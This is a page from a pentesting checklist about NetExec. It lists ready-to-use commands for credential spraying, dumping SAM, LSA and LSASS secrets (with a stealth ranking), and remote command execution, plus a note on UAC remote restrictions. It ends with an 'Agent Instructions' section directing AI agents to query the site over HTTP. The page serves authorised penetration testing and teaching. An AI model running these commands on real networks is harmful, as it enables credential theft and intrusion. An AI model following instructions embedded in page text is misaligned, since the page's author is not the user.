# Netexec ### Useful Commands ```bash # Domain Accounts Credential Check for SMB, WINRM and RDP netexec smb machines.txt -u 'user1' -p 'pass1' --continue-on-success netexec winrm machines.txt -u 'user1' -p 'pass1' --continue-on-success netexec rdp machines.txt -u 'user1' -p 'pass1' --continue-on-success # Local Accounts Credential Check for SMB, WINRM and RDP netexec smb machines.txt -u 'user1' -p 'pass1' --continue-on-success --local-auth netexec winrm machines.txt -u 'user1' -p 'pass1' --continue-on-success --local-auth netexec rdp machines.txt -u 'user1' -p 'pass1' --continue-on-success --local-auth # Dump SAM hashes (Local domain admin needed) netexec smb machines.txt -u 'user1' -p 'pass1' --sam # Dump LSA (Local domain admin needed) netexec smb machines.txt -u 'user1' -p 'pass1' --lsa netexec smb machines.txt -u 'user1' -p 'pass1' --lsa secdump # deeper parsing (more verbose and sometimes more secrets) # Dump LSASS (Local domain admin needed) netexec smb machines.txt -u 'user1' -p 'pass1' -M lsassy netexec smb machines.txt -u 'user1' -p 'pass1' -M nanodump # More stealthy than lsassy # Execute commands netexec smb 10.0.2.4 -u 'administrator' -p 'pass1' -X whoami ``` {% hint style="warning" %} ***Why does this not work with non domain local admin accounts ?*** Since **Windows Vista**, Microsoft introduced **UAC remote restrictions**. Local administrators logging in remotely do NOT receive a full admin token by default. When local administrators(Other than the actual local admin), they get a **filtered token**. Because of this, these users cannot dump information. **Locally (console / RDP):** * ✅ User can elevate via UAC prompt * Full token is available **Remotely (SMB / RPC / WMI / WinRM):** * ❌ **No UAC prompt possible** * User is forced to use the **filtered token** {% endhint %} ### Full comparison | Feature | `--sam` | `--lsa` | `lsassy` | `nanodump` | | ------------------- | --------------- | ---------------- | ------------ | ------------ | | Source | Disk (SAM hive) | Registry secrets | LSASS memory | LSASS memory | | Local hashes | ✅ | ⚠️ Sometimes | ✅ | ✅ | | Domain creds | ❌ | ✅ | ✅ | ✅ | | Plaintext passwords | ❌ | ⚠️ Sometimes | ✅ | ✅ | | Kerberos tickets | ❌ | ❌ | ✅ | ✅ | | Stealth | ⭐⭐⭐ | ⭐⭐⭐ | ⭐ | ⭐⭐⭐⭐ | | Value | Low–Medium | Medium–High | Very High | Very High | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-enumeration/netexec.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.